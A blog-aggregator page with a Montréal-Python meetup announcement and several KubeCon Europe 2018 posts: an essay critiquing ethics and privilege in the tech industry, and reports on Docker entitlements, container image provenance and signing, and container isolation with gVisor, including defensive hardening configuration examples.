
External Blogs

Montréal-Python 72 - Carroty Xenophon

Montreal Python - Sun, 06/03/2018 - 23:00

Let’s meet one last time before our Summer break! Thanks to Notman House for sponsoring this event.

Presentations

Socket - Éric Lafontaine

Most of our everyday jobs involve making requests over the internet or hosting a web solution for our company. Each connection we make uses the socket API in some way that is not always evident. By giving this talk, I hope to elucidate some of the magic contained in the socket API. I'm also going to share some tricks I've been using since I came to understand that API.

Probabilistic Programming and Bayesian Modeling with PyMC3 - Christopher Fonnesbeck

Bayesian statistics offers powerful, flexible methods for data analysis that, because they are based on full probability models, confer several benefits to analysts including scalability, straightforward quantification of uncertainty, and improved interpretability relative to classical methods. The advent of probabilistic programming has served to abstract the complexity associated with fitting Bayesian models, making such methods more widely available. PyMC3 is software for probabilistic programming in Python that implements several modern, computationally intensive statistical algorithms for fitting Bayesian models. PyMC3’s intuitive syntax is helpful for new users, and its reliance on the Theano library for fast computation has allowed developers to keep the code base simple, making it easy to extend and expand the software to meet analytic needs. Importantly, PyMC3 implements several next-generation Bayesian computational methods, allowing for more efficient sampling for small models and better approximations to larger models with larger associated datasets. I will demonstrate how to construct, fit and check models in PyMC3, using a selection of applied problems as motivation.

When

Monday June 11th, 2018 at 6PM

Where

Notman House

51 Sherbrooke West

Montréal, QC

H2X 1X2

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations
  • 8:00PM - End of the event
  • 8:15PM - Benelux

Diversity, education, privilege and ethics in technology

Anarcat - Sat, 05/26/2018 - 11:48

This article is part of a series on KubeCon Europe 2018.

This is a rant I wrote while attending KubeCon Europe 2018. I do not know how else to frame this deep discomfort I have with the way one of the most cutting-edge projects in my community is moving. I see it as a symptom of so many things wrong in society at large and figured it was as good a way as any to open the discussion regarding how free software communities seem to naturally evolve into corporate money-making machines with questionable ethics.

A white man groomed by a white woman

Diversity and education

There is often a great point made of diversity at KubeCon, and that is something I truly appreciate. It's one of the places where I have seen the largest efforts towards that goal; I was impressed by the efforts made in Austin, and mentioned it in my overview of that conference back then. Yet it is still one of the less diverse places I've ever participated in: in comparison, PyCon "feels" more diverse, for example. And then there's real life out there, where women constitute basically half the population. This says something about the actual effectiveness of diversity efforts in our communities.

4000 white men

The truth is that, contrary to programmer communities, "operations" knowledge (sysadmin, SRE, DevOps, whatever it's called these days) comes not from institutional education, but from self-learning. Even though I have years of university training, the day-to-day knowledge I need in my work as a sysadmin comes not from the university, but from late-night experiments on my personal computer network. This happened first on the Macintosh, then on the FreeBSD source code passed down as a magic word from an uncle, and finally through Debian, consecrated as the leftist's true computing way. Sure, my programming skills were useful there, but I acquired those before going to university: even there, teachers expected students to learn programming languages (such as C!) in between sessions.

Diversity program

The real solutions to the lack of diversity in our communities come not only from a change in culture, but also from real investments in society at large. The mega-corporations subsidizing events like KubeCon make sure they get a lot of good press from those diversity programs. However, the money they spend on them is nothing compared to the taxes they evade in their home states. As an example, Amazon recently put 7,000 jobs on hold because of a tax the city of Seattle wanted to impose on corporations to help the homeless population. Google, Facebook, Microsoft, and Apple all evade taxes like gangsters. This matters because society changes partly through education, and that costs money. Education is how more traditional STEM sectors like engineering and medicine changed: women, minorities, and poorer populations were finally allowed into schools after the epic social struggles of the 1970s yielded more accessible education. Just as the culture changes are seeing a backlash, the tide is turning there as well, with the trend reversing towards more costly, less accessible education. But not everywhere. The impacts of education changes are long-lasting. By evading taxes, those companies deprive the state of revenues that could level the playing field through affordable education.

Hell, any education in the field would help. There is basically no sysadmin education curriculum right now. Sure, you can follow Cisco CCNA or MCSE private training courses. But anyone who's been seriously involved in running any computing infrastructure knows those are a scam: they will tie you down to a proprietary universe (Cisco and Microsoft, respectively) and will probably lead only to "remote hands monkey" positions, rarely to executive ones.

Velocity

Besides, providing an education curriculum would require the field to slow down so that knowledge could settle and trickle into a curriculum. Configuration management is pretty old, but because the changes in tooling are fast, any curriculum built in the last decade (or even less) quickly becomes irrelevant. Puppet publishes a new release every six months, Kubernetes is barely four years old now, and it is changing rapidly with a ~3 month release schedule.

Here at KubeCon, Mark Zuckerberg's mantra of "move fast and break things" is everywhere. We call it "velocity": where you are going does not matter as much as how fast you're going there. At one of the many keynotes, Abby Kearns from the Cloud Foundry Foundation boasted about how Home Depot, in trying to sell more hammers than Amazon, is now deploying code to production multiple times a day. I am still unclear as to whether this made Home Depot actually sell more hammers, or whether it's something we should even care about in the first place. Shouldn't we converge on selling fewer hammers? Making them more solid and reliable, so that they are passed down through generations instead of breaking and having to be replaced all the time?

Home Depot ecstasy

We're solving a problem that wasn't there in some new absurd faith that code deployments will naturally make people happier, by making sure Home Depot sells more hammers. And that's after telling us that Cloud Foundry helped the USAF save 600M$ by moving their databases to the cloud. No one seems bothered by the idea that the most powerful military in existence would move state secrets into a private cloud, out of the control of any government. It's the name of the game, at KubeCon.

USAF saves (money)

In his keynote, Alexis Richardson, CEO of Weaveworks, presented the toaster project as an example of what not to do. "He did not use any sourced components, everything was built from scratch, by hand", obviously missing the fact that toasters are deliberately not built from reusable parts, as part of their planned-obsolescence design. The goal of the toaster experiment is also to show how fragile our civilization has become precisely because we depend on layers upon layers of parts. In this totalitarian view of the world, people are also "reusable" or, in this case, "disposable" components: not just the white dudes in California, but also the workers outsourced out of the USA decades ago. It depends on precious metals and the miners of Africa, on the specialized labour and intricate knowledge of the factory workers in Asia, and on the flooded forests of the First Nations powering this terrifying surveillance machine.

Privilege

"Left to his own devices he couldn’t build a toaster. He could just about make a sandwich and that was it." -- Mostly Harmless, Douglas Adams, 1992

Staying in a hotel room for a week, all expenses paid, certainly puts things in perspective. Rarely have I felt more privileged in my entire life: someone else makes my food, makes my bed, and magically cleans up the toilet when I'm gone. For me, this is extraordinary, but for many people at KubeCon, it's routine: traveling is part of the rock-star agenda of this community. People get used to being served, both directly in their day-to-day lives and through the complex supply chain of the modern technology that is destroying the planet.

Nothing is like corporate nothing.

The nice little boxes and containers we call the cloud all abstract this away from us, and those dependencies are actively encouraged in the community. We like containers here and their image is ubiquitous. We acknowledge that a single person cannot run a Kube shop because the required knowledge is too broad for any one person to handle. While there are interesting collaborative and social ideas in that approach, I am deeply skeptical of its impact on civilization in the long run. We have already created systems so complex that we don't truly know who hacked the Trump election, or how. Many feel it was hacked, but it's really just a hunch: there were bots, maybe they were Russian, or maybe from Cambridge? The DNC emails, was that really WikiLeaks? Who knows! Never mind failing closed or open: the system has become so complex that we don't even know how we fail when we do. Even those in the highest positions of power seem unable to protect themselves; politics seems to have become a game of Russian roulette: we cock the bot, roll the secret algorithm, and see what dictator will shoot out.

Ethics

All this is to build a new Skynet; not this one or that one, those already exist. I was able to joke pleasantly about the AI takeover during breakfast with a random stranger without raising so much as an eyebrow: we know it will happen, oh well. I've skipped that track in my attendance, but multiple talks at KubeCon are about AI, TensorFlow (it's open source!), self-driving cars, and removing humans from the equation as much as possible, as a general principle. Kubernetes is often shortened to "Kube", which I always think of as a reference to the almighty Borg ship from Star Trek, the "cube". This might actually make sense given that Kubernetes is an open-source version of Google's internal software incidentally called... Borg. Making such fleeting, tongue-in-cheek references to a totalitarian civilization is not harmless: it makes more acceptable the notion that AI domination is inescapable and that resistance truly is futile, the ultimate neo-colonial scheme.

"We are the Borg. Your biological and technological distinctiveness will be added to our own. Resistance is futile."

The "hackers" of our age are building this machine with conscious knowledge of the social and ethical implications of their work. At best, people admit to not knowing what they really are. In the worse case scenario, the AI apocalypse will bring massive unemployment and a collapse of the industrial civilization, to which Silicon Valley executives are responding by buying bunkers to survive the eventual roaming gangs of revolted (and now armed) teachers and young students coming for revenge.

Only the most privileged people in society could imagine such a scenario and actually opt out of society as a whole. Even the robber barons of the 20th century knew they couldn't survive the coming revolution: Andrew Carnegie built libraries after creating the steel empire that drove much of US industrialization near the end of the century and John D. Rockefeller subsidized education, research and science. This is not because they were humanists: you do not become an oil tycoon by tending to the poor. Rockefeller said that "the growth of a large business is merely a survival of the fittest", a social darwinist approach he gladly applied to society as a whole.

But the 70's rebel beat offspring, the children of the cult of Job, do not seem to have the depth of analysis to understand what's coming for them. They want to "hack the system" not for everyone, but for themselves. Early on, we have learned to be selfish and self-driven: repressed as nerds and rejected in the schools, we swore vengeance on the bullies of the world, and boy are we getting our revenge. The bullied have become the bullies, and it's not small boys in schools we're bullying, it is entire states, with which companies are now negotiating as equals.

The fraud

...but what are you creating exactly?

And that is the ultimate fraud: to make the world believe we are harmless little boys, so repressed that we can't communicate properly. We're so sorry we're awkward, it's because we're all somewhat on the autism spectrum. Isn't that, after all, a convenient affliction for people that would not dare to confront the oppression they are creating? It's too easy to hide behind such a real and serious condition that does affect people in our community, but also truly autistic people that simply cannot make it in the fast-moving world the magical rain man is creating. But the real con is hacking power and political control away from traditional institutions, seen as too slow-moving to really accomplish the "change" that is "needed". We are creating an inextricable technocracy that no one will understand, not even us "experts". Instead of serving the people, the machine is at the mercy of markets and powerful oligarchs.

A recurring pattern at Kubernetes conferences is the KubeCon chant, in which Kelsey Hightower reluctantly engages the crowd:

When I say 'Kube!', you say 'Con!'

'Kube!' 'Con!' 'Kube!' 'Con!' 'Kube!' 'Con!'

Cube Con indeed...

I wish I had some wise parting thoughts about where to go from here or how to change this. The tide seems so strong that all I can do is observe and tell stories. My hope is that the people who need to hear this will take it the right way, but I somehow doubt it. With luck, it might just become irrelevant and everything will fix itself, but somehow I fear things will get worse before they get better.


Easier container security with entitlements

Anarcat - Mon, 05/21/2018 - 19:00

This article is part of a series on KubeCon Europe 2018.

During KubeCon + CloudNativeCon Europe 2018, Justin Cormack and Nassim Eddequiouaq presented a proposal to simplify the setting of security parameters for containerized applications. Containers depend on a large set of intricate security primitives that can have weird interactions. Because they are so hard to use, people often just turn the whole thing off. The goal of the proposal is to make those controls easier to understand and use; it is partly inspired by mobile apps on iOS and Android platforms, an idea that trickled back into Microsoft and Apple desktops. The time seems ripe to improve the field of container security, which is in desperate need of simpler controls.

The problem with container security

Cormack first stated that container security is too complicated. His slides stated bluntly that "unusable security is not security" and he pleaded for simpler container security mechanisms with clear guarantees for users.

"Container security" is a catchphrase that actually includes all sorts of measures, some of which we have previously covered. Cormack presented an overview of those mechanisms, including capabilities, seccomp, AppArmor, SELinux, namespaces, control groups — the list goes on. He showed how docker run --help has a "ridiculously large number of options"; there are around one hundred on my machine, with about fifteen just for security mechanisms. He said that "most developers don't know how to actually apply those mechanisms to make sure their containers are secure". In the best-case scenario, some people may know what the options are, but in most cases people don't actually understand each mechanism in detail.

He gave the example of capabilities; there are about forty possible values that can be provided for the --cap-drop option, each with its own meaning. He described some capabilities as "understandable", but said that others end up in overly broad boxes. The kernel's data structure limits the system to a maximum of 64 capabilities, so a bunch of functionality was lumped together into CAP_SYS_ADMIN, he said.
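
To make this concrete, here is the kind of invocation Cormack was describing, as a minimal sketch: drop every capability and add back only what the service actually needs. The image name and the capability choice are hypothetical.

# Start from zero capabilities, then grant only the ability to bind
# to a privileged port; also forbid gaining new privileges at runtime.
docker run --rm \
    --cap-drop ALL \
    --cap-add NET_BIND_SERVICE \
    --security-opt no-new-privileges \
    registry.example.com/mywebapp:1.0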

Cormack also talked about namespaces and seccomp. While there are fewer namespaces than capabilities, he said that "it's very unclear for a general user what their security properties are". For example, "some combinations of capabilities and namespaces will let you escape from a container, and other ones don't". He also described seccomp as a "long JSON file", as that's the way Kubernetes configures it; even though those files could "usefully be even more complicated", he said, they are already "very difficult to write".
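
To give an idea of what those "long JSON files" look like, here is a heavily trimmed sketch in the format Docker accepts for seccomp profiles; a realistic profile whitelists several hundred system calls, and the handful listed here is purely illustrative:

{
  "defaultAction": "SCMP_ACT_ERRNO",
  "syscalls": [
    {
      "names": ["read", "write", "close", "exit_group", "futex"],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}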

Cormack stopped his enumeration there, but the same applies to the other mechanisms. He said that while developers could sit down and write those policies for their application by hand, it's a real mess and makes their heads explode. So instead developers run their containers in --privileged mode. It works, but it disables all the nice security mechanisms that the container abstraction provides. This is why "containers do not contain", as Dan Walsh famously quipped.

Introducing entitlements

There must be a better way. Eddequiouaq proposed this simple idea: "provide something humans can actually understand without diving into code or possibly even without reading documentation". The solution proposed by the Docker security team is "entitlements": the ability for users to choose simple permissions on the command line. Eddequiouaq said that application users and developers alike don't need to understand the low-level security mechanisms or how they interact within the kernel; "people don't care about that, they want to make sure their app is secure."

Entitlements divide resources into meaningful domains like "network", "security", or "host resources" (like devices). Behind the scenes, Docker translates those into whatever security mechanisms are available. This implies that the actual mechanism deployed will vary between runtimes, depending on the implementation. For example, a "confined" network access might mean a seccomp filter blocking all networking-related system calls except socket(AF_UNIX|AF_LOCAL) along with dropping network-related capabilities. AppArmor will deny network on some platforms while SELinux would do similar enforcement on others.

Eddequiouaq said the complexity of implementing those mechanisms is the responsibility of platform developers. Image developers can ship entitlement lists along with container images created with a regular docker build, and sign the whole bundle with docker trust. Because entitlements do not specify explicit low-level mechanisms, the resulting image is portable to different runtimes without change. Such portability helps Kubernetes on non-Linux platforms do its job.
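
From an image developer's point of view, the workflow sketched above stays close to the familiar commands; the image name below is hypothetical, and the exact flag for attaching an entitlement list is part of the proposal rather than shipping Docker, so it is not shown:

# Build the image as usual; the entitlement list travels with the bundle.
docker build -t registry.example.com/myapp:1.0 .

# Sign the result so consumers can verify who published it.
docker trust sign registry.example.com/myapp:1.0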

Entitlements shift the responsibility for configuring sandboxing environments to image developers, but also empower them to deliver security mechanisms directly to end users. Developers are the ones with the best knowledge about what their applications should or should not be doing. Image end users, in turn, benefit from verifiable security properties delivered by the bundles and from the expertise of image developers when they docker pull and run those images.

Eddequiouaq gave a demo of the community's nemesis: Docker inside Docker (DinD). He picked that use case because it requires a lot of privileges, which usually means using the dreaded --privileged flag. With the entitlements patch, he was able to run DinD with network.admin, security.admin, and host.devices.admin, which looks like --privileged, but actually means some protections are still in place. According to Eddequiouaq, "everything works and we didn't have to disable all the seccomp and AppArmor profiles". He also gave a demo of how to build an image and demonstrated how docker inspect shows the entitlements bundled inside the image. With such an image, docker run starts a DinD image without any special flags. That requires a way to trust the content publisher because suddenly images can elevate their own privileges without the caller specifying anything on the Docker command line.

Goals and future

The specification aims to provide the best user experience possible, so that people actually start using the security mechanisms provided by the platforms instead of opting out of security configurations when they get a "permission denied" error. Eddequiouaq said that Docker eventually wants to "ditch the --privileged flag because it is really a bad habit". Instead, applications should run with the least privileges they need. He said that "this is not the case; currently, everyone works with defaults that work with 95% of the applications out there." Those Docker defaults, he said, provide a "way too big attack surface".

Eddequiouaq opened the door for developers to define custom entitlements because "it's hard to come up with a set that will cover all needs". One way the team thought of dealing with that uncertainty is to have versions of the specification but it is unclear how that would work in practice. Would the version be in the entitlement labels (e.g. network-v1.admin), or out of band?

Another feature proposed is the control of API access and service-to-service communication in the security profile. This is something that's actually available on phones, where an app can only talk with a specific set of services. But that is also relevant to containers in Kubernetes clusters as administrators often need to restrict network access with more granularity than the "open/filter/close" options. An example of such policy could allow the "web" container to talk with the "database" container, although it might be difficult to specify such high-level policies in practice.

While entitlements are now implemented in Docker as a proof of concept, Kubernetes has the same usability issues as Docker so the ultimate goal is to get entitlements working in Kubernetes runtimes directly. Indeed, its PodSecurityPolicy maps (almost) one-to-one with the Docker security flags. But as we have previously reported, another challenge in Kubernetes security is that the security models of Kubernetes and Docker are not exactly identical.

Eddequiouaq said that entitlements could help share best security policies for a pod in Kubernetes. He proposed that such configuration would happen through the SecurityContext object. Another way would be an admission controller that would avoid conflicts between the entitlements in the image and existing SecurityContext profiles already configured in the cluster. There are two possible approaches in that case: the rules from the entitlements could expand the existing configuration or restrict it where the existing configuration becomes a default. The problem here is that the pod's SecurityContext already provides a widely deployed way to configure security mechanisms, even if it's not portable or easy to share, so the proposal shouldn't break existing configurations. There is work in progress in Docker to allow inheriting entitlements within a Dockerfile. Eddequiouaq proposed that Kubernetes should implement a simple mechanism to inherit entitlements from images in the admission controller.

The Docker security team wants to create a "widely adopted standard" supported by Docker swarm, Kubernetes, or any container scheduler. But it's still unclear how deep into the Kubernetes stack entitlements belong. In the team's current implementation, Docker translates entitlements into the security mechanisms right before calling its runtime (containerd), but it might be possible to push the entitlements concept straight into the runtime itself, as it knows best how the platform operates.

Some readers might also notice fundamental similarities between this and other mechanisms such as OpenBSD's pledge(), which made me wonder if entitlements belong in user space in the first place. Cormack observed that seccomp was such a "pain to work with to do complicated policies". He said that having eBPF seccomp filters would make it easier to deal with conflicts between policies and also mentioned the work done on the Checmate and Landlock security modules as interesting avenues to explore. It seems that none of those kernel mechanisms are ready for prime time, at least not to the point that Docker can use them in production. Eddequiouaq said that the proposal was open to changes and discussion so this is all work in progress at this stage. The next steps are to make a proposal to the Kubernetes community before working on an actual implementation outside of Docker.

I have found the core idea of protecting users from all the complicated stuff in container security interesting. It is a recurring theme in container security; we've previously discussed proposals to add container identifiers in the kernel directly for example. Everyone knows security is sensitive and important in Kubernetes, yet doing it correctly is hard. This is a recipe for disaster, which has struck in high profile cases recently. Hopefully having such easier and cleaner mechanisms will help users, developers, and administrators alike.

A YouTube video and slides [PDF] of the talk are available.

This article first appeared in the Linux Weekly News.


Securing the container image supply chain

Anarcat - Thu, 05/17/2018 - 12:00

This article is part of a series on KubeCon Europe 2018.

KubeCon EU "Security is hard" is a tautology, especially in the fast-moving world of container orchestration. We have previously covered various aspects of Linux container security through, for example, the Clear Containers implementation or the broader question of Kubernetes and security, but those are mostly concerned with container isolation; they do not address the question of trusting a container's contents. What is a container running? Who built it and when? Even assuming we have good programmers and solid isolation layers, propagating that good code around a Kubernetes cluster and making strong assertions on the integrity of that supply chain is far from trivial. The 2018 KubeCon + CloudNativeCon Europe event featured some projects that could eventually solve that problem.

Image provenance

A first talk, by Adrian Mouat, provided a good introduction to the broader question of "establishing image provenance and security in Kubernetes" (video, slides [PDF]). Mouat compared software to food you get from the supermarket: "you can actually tell quite a lot about the product; you can tell the ingredients, where it came from, when it was packaged, how long it's good for". He explained that "all livestock in Europe have an animal passport so we can track its movement throughout Europe and beyond". That "requires a lot of work, and time, and money, but we decided that this was worthwhile doing so that we know [our food is] safe to eat. Can we say the same thing about the software running in our data centers?" This is especially a problem in complex systems like Kubernetes; containers have inherent security and licensing concerns, as we have recently discussed.

You should be able to easily tell what is in a container: what software it runs, where it came from, how it was created, and if it has any known security issues, he said. Mouat also expects those properties to be provable and verifiable with strong cryptographic assertions. Kubernetes can make this difficult. Mouat gave a demonstration of how, by default, the orchestration framework will allow different versions of the same container to run in parallel. In his scenario, this is because the default image pull policy (ifNotPresent) might pull a new version on some nodes and not others. This problem arises because of an inconsistency between the way Docker and Kubernetes treat image tags; the former as mutable and the latter as immutable. Mouat said that "the default semantics for pulling images in Kubernetes are confusing and dangerous." The solution here is to deploy only images with tags that refer to a unique version of a container, for example by embedding a Git hash or unique version number in the image tag. Obviously, changing the policy to AlwaysPullImages will also help in solving the particular issue he demonstrated, but will create more image churn in the cluster.
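
In a pod specification, that advice boils down to something like the following sketch; the registry, name, and tag are made up, and the point is the unique build-specific tag combined with an explicit pull policy:

apiVersion: v1
kind: Pod
metadata:
  name: frontend
spec:
  containers:
  - name: frontend
    # The tag embeds a unique build identifier instead of a mutable tag like "latest"
    image: registry.example.com/frontend:1.4.2-g3f2c1ab
    # Always resolve the tag against the registry instead of trusting a local copy
    imagePullPolicy: Always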

But that's only a small part of the problem; even if Kubernetes actually runs the correct image, how can you tell what is actually in that image? In theory, this should be easy. Docker seems like the perfect tool to create deterministic images that consist exactly of what you asked for: a clean and controlled, isolated environment. Unfortunately, containers are far from reproducible and the problem begins on the very first line of a Dockerfile. Mouat gave the example of a FROM debian line, which can mean different things at different times. It should normally refer to Debian "stable", but that's actually a moving target; Debian makes new stable releases once in a while, and there are regular security updates. So what first looks like a static target is actually moving. Many Dockerfiles will happily fetch random source code and binaries from the network. Mouat encouraged people to at least checksum the downloaded content to prevent basic attacks and problems.

Unfortunately, all this still doesn't get us reproducible builds since container images include file timestamps, build identifiers, and image creation time that will vary between builds, making container images hard to verify through bit-wise comparison or checksums. One solution there is to use alternative build tools like Bazel that allow you to build reproducible images. Mouat also added that there is "tension between reproducibility and keeping stuff up to date" because using hashes in manifests will make updates harder to deploy. By using FROM debian, you automatically get updates when you rebuild that container. Using FROM debian:stretch-20180426 will get you a more reproducible container, but you'll need to change your manifest regularly to follow security updates. Once we know what is in our container, there is at least a standard in the form of the OCI specification that allows attaching annotations to document the contents of containers.
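
A Dockerfile following that advice might look like the sketch below; the download URL and checksum are placeholders, and pinning the base image to a dated tag is exactly the reproducibility-versus-updates trade-off Mouat described:

# Pin the base image to a dated tag (or a digest) rather than a moving target
FROM debian:stretch-20180426

# Fetch a dependency and refuse to build if its checksum does not match
ADD https://example.com/app-1.2.3.tar.gz /tmp/app.tar.gz
RUN echo "<expected-sha256>  /tmp/app.tar.gz" | sha256sum -c - \
 && tar -xzf /tmp/app.tar.gz -C /usr/local/src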

Another problem is making sure containers are up to date, a "weirdly hard" question to answer according to Mouat: "why can't I ask my registry [if] there is a new version of [a] tag? As far as I know, there's no way you can do that." Mouat literally hand-waved at a slide showing various projects designed to scan container images for known vulnerabilities, introducing Aqua, Clair, NeuVector, and Twistlock. Mouat said we need a more "holistic" solution than the current whack-a-mole approach. His company is working on such a product called Trow, but not much information about it was available at the time of writing.

The long tail of the supply chain

Verifying container images is exactly the kind of problem Notary is designed to solve. Notary is a server "that allows anyone to have trust over arbitrary collections of data". In practice, that can be used by the Docker daemon as an additional check before fetching images from the registry. This allows operators to approve images with cryptographic signatures before they get deployed in the cluster.
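
On the Docker side, that check is switched on with the content trust setting; with it enabled, pulls of unsigned tags simply fail (the registry and tag here are hypothetical):

# Refuse to pull or run any tag that does not carry a valid Notary signature
export DOCKER_CONTENT_TRUST=1
docker pull registry.example.com/frontend:1.4.2-g3f2c1ab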

Notary implements The Update Framework (TUF), a specification covering the nitty-gritty details of signatures, key rotation, and delegation. It keeps signed hashes of container images that can be used for verification; it can be deployed by enabling Docker's "content trust" in any Docker daemon, or by configuring a custom admission controller with a web hook in Kubernetes. In another talk (slides [PDF], video) Liam White and Michael Hough covered the basics of Notary's design and how it interacts with Docker. They also introduced Portieris as an admission controller hook that can implement a policy like "allow any image from the LWN Docker registry as long as it's signed by your favorite editor". Policies can be scoped by namespace as well, which can be useful in multi-tenant clusters. The downside of Portieris is that it supports only IBM Cloud Notary servers because the images need to be explicitly mapped between the Notary server and the registry. The IBM team knows only how to map its own images, but the speakers said they were open to contributions there.

A limitation of Notary is that it looks only at the last step of the build chain; in itself, it provides no guarantees on where the image comes from, how the image was built, or what it's made of. In yet another talk (slides [PDF] video), Wendy Dembowski and Lukas Puehringer introduced a possible solution to that problem: two projects that work hand-in-hand to provide end-to-end verification of the complete container supply chain. Puehringer first introduced the in-toto project as a tool to authenticate the integrity of individual build steps: code signing, continuous integration (CI), and deployment. It provides a specification for "open and extensible" metadata that certifies how each step was performed and the resulting artifacts. This could be, at the source step, as simple as a Git commit hash or, at the CI step, a build log and artifact checksums. All steps are "chained" as well, so that you can track which commit triggered the deployment of a specific image. The metadata is cryptographically signed by role keys to provide strong attestations as to the provenance and integrity of each step. The in-toto project is supervised by Justin Cappos, who also works on TUF, so it shares some of its security properties and integrates well with the framework. Each step in the build chain has its own public/private key pair, with support for role delegation and rotation.
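
As a rough sketch of how a single step is attested with in-toto's reference implementation, a CI system might wrap its build command as shown below; the step name, key file, paths, and build command are all hypothetical:

# Record the materials (inputs) and products (outputs) of the "build" step,
# and sign the resulting link metadata with this step's private key.
in-toto-run --step-name build \
    --key build-key \
    --materials src/ \
    --products dist/app.tar.gz \
    -- make release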

In-toto is a generic framework allowing a complete supply chain verification by providing "attestations" that a given artifact was created by the right person using the right source. But it does not necessarily provide the hooks to do those checks in Kubernetes itself. This is where Grafeas comes in, by providing a global API to read and store metadata. That can be package versions, vulnerabilities, license or vulnerability scans, builds, images, deployments, and attestations such as those provided by in-toto. All of those can then be used by the Kubernetes admission controller to establish a policy that regulates image deployments. Dembowski referred to this tutorial by Kelsey Hightower as an example configuration to integrate Grafeas in your cluster. According to Puehringer: "It seems natural to marry the two projects together because Grafeas provides a very well-defined API where you can push metadata into, or query from, and is well integrated in the cloud ecosystem, and in-toto provides all the steps in the chain."

Dembowski said that Grafeas is already in use at Google and it has been found useful to keep track of metadata about containers. Grafeas can keep track of what each container is running, who built it, when (sometimes vulnerable) code was deployed, and make sure developers do not ship containers built on untrusted development machines. This can be useful when a new vulnerability comes out and administrators scramble to figure out if or where affected code is deployed.

Puehringer explained that in-toto's reference implementation is complete and he is working with various Linux distributions to get them to use link metadata to have their package managers perform similar verification.

Conclusion

The question of container trust hardly seems resolved at all; the available solutions are complex and would be difficult to deploy for Kubernetes rookies like me. However, it seems that Kubernetes could make small improvements to improve security and auditability, the first of which is probably setting the image pull policy to a more reasonable default. In his talk, Mouat also said it should be easier to make Kubernetes fetch images only from a trusted registry instead of allowing any arbitrary registry by default.

Beyond that, cluster operators wishing to have better control over their deployments should start looking into setting up Notary with an admission controller, maybe Portieris if they can figure out how to make it play with their own Notary servers. Considering the apparent complexity of Grafeas and in-toto, I would assume that those would probably be reserved only to larger "enterprise" deployments but who knows; Kubernetes may be complex enough as it is that people won't mind adding a service or two in there to improve its security. Keep in mind that complexity is an enemy of security, so operators should be careful when deploying solutions unless they have a good grasp of the trade-offs involved.

This article first appeared in the Linux Weekly News.


Updates in container isolation

Anarcat - Wed, 05/16/2018 - 12:00

This article is part of a series on KubeCon Europe 2018.

At KubeCon + CloudNativeCon Europe 2018, several talks explored the topic of container isolation and security. The last year saw the release of Kata Containers which, combined with the CRI-O project, provided strong isolation guarantees for containers using a hypervisor. During the conference, Google released its own hypervisor called gVisor, adding yet another possible solution for this problem. Those new developments prompted the community to work on integrating the concept of "secure containers" (or "sandboxed containers") deeper into Kubernetes. This work is now coming to fruition; it prompts us to look again at how Kubernetes tries to keep the bad guys from wreaking havoc once they break into a container.

Attacking and defending the container boundaries

Tim Allclair's talk (slides [PDF], video) was all about explaining the possible attacks on secure containers. To simplify, Allclair said that "secure is isolation, even if that's a little imprecise" and explained that isolation is directional across boundaries: for example, a host might be isolated from a guest container, but the container might be fully visible from the host. So there are two distinct problems here: threats from the outside (attackers trying to get into a container) and threats from the inside (attackers trying to get out of a compromised container). Allclair's talk focused on the latter. In this context, sandboxed containers are concerned with threats from the inside; once the attacker is inside the sandbox, they should not be able to compromise the system any further.

Attacks can take multiple forms: untrusted code provided by users in multi-tenant clusters, un-audited code fetched from random sites by trusted users, or trusted code compromised through an unknown vulnerability. According to Allclair, defending a system from a compromised container is harder than defending a container from external threats, because there is a larger attack surface. While outside attackers only have access to a single port, attackers on the inside often have access to the kernel's extensive system-call interface, a multitude of storage backends, the internal network, daemons providing services to the cluster, hardware interfaces, and so on.

Taking those vectors one by one, Allclair first looked at the kernel and said that there were 169 code execution vulnerabilities in the Linux kernel in 2017. He admitted this was a bit of fear mongering; it indeed was a rather unusual year and "most of those were in mobile device drivers". These vulnerabilities are not really a problem for Kubernetes unless you run it on your phone. Allclair said that at least one attendee at the conference was probably doing exactly that; as it turns out, some people have managed to run Kubernetes on a vacuum cleaner. Container runtimes implement all sorts of mechanisms to reduce the kernel's attack surface: Docker has seccomp profiles, but Kubernetes turns those off by default. Runtimes will use AppArmor or SELinux rule sets. There are also ways to run containers as non-root, which was the topic of a pun-filled separate talk as well. Unfortunately, those mechanisms do not fundamentally solve the problem of kernel vulnerabilities. Allclair cited the Dirty COW vulnerability as a classic example of a container escape through race conditions on system calls that are allowed by security profiles.
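
For reference, turning those mechanisms back on in a Kubernetes 1.10-era cluster went through pod annotations and the security context; a minimal sketch (profile choices and image name are illustrative) looks like this:

apiVersion: v1
kind: Pod
metadata:
  name: hardened-app
  annotations:
    # Opt back into the runtime's default seccomp profile (off by default)
    seccomp.security.alpha.kubernetes.io/pod: docker/default
    # Confine the "app" container with the runtime's default AppArmor profile
    container.apparmor.security.beta.kubernetes.io/app: runtime/default
spec:
  containers:
  - name: app
    image: registry.example.com/app:1.0
    securityContext:
      runAsNonRoot: true
      allowPrivilegeEscalation: false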

The proposed solution to this problem is to add a second security boundary. This is apparently an overarching principle at Google, according to Allclair: "At Google, we have this security principle that between any untrusted code and user data there have to be at least two distinct security boundaries, so that means two independent security mechanisms need to fail in order for that untrusted code to get out that user data."

Adding another boundary makes attacks harder to accomplish. One such solution is to use a hypervisor like Kata Containers or gVisor. Those new runtimes depend on a sandboxed setting that is still in the proposal stage in the Kubernetes API.

gVisor as an extra boundary

Let's look at gVisor as an example hypervisor. Google spent five years developing the project in the dark before sharing it with the world. At KubeCon, it was introduced in a keynote and a more in-depth talk (slides [PDF], video) by Dawn Chen and Zhengyu He. gVisor is a user-space kernel that implements a subset of the Linux kernel API, but which was written from scratch in Go. The idea is to have an independent kernel that reduces the attack surface; while the Linux kernel has 20 million lines of code, at the time of writing gVisor only has 185,000, which should make it easier to review and audit. It provides a cleaner and simpler interface: no hardware drivers, interrupts, or I/O port support to implement, as the host operating system takes care of all that mess.

As shown in a diagram in the talk slides, gVisor has a component called "sentry" that implements the core of the system-call logic. It uses ptrace() out of the box for portability reasons, but can also work with KVM for better security and performance, as ptrace() is slow and racy. Sentry can use KVM to map processes to CPUs and provide lower-level support like privilege separation and memory management. He suggested thinking of gVisor as a "layered solution" to provide isolation, as it also uses seccomp filters and namespaces. He explained how it differed from user-mode Linux (UML): while UML is a port of Linux to user space, gVisor actually reimplements the Linux system calls (211 of the 319 x86-64 system calls) using only 64 system calls in the host system. Another key difference from other systems, like unikernels or Google's Native Client (NaCl), is that it can run unmodified binaries. To fix classes of attacks relying on the open() system call, gVisor also forbids any direct filesystem access; all filesystem operations go through a second process called the Gofer that enforces access permissions, in another example of a double security boundary.
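
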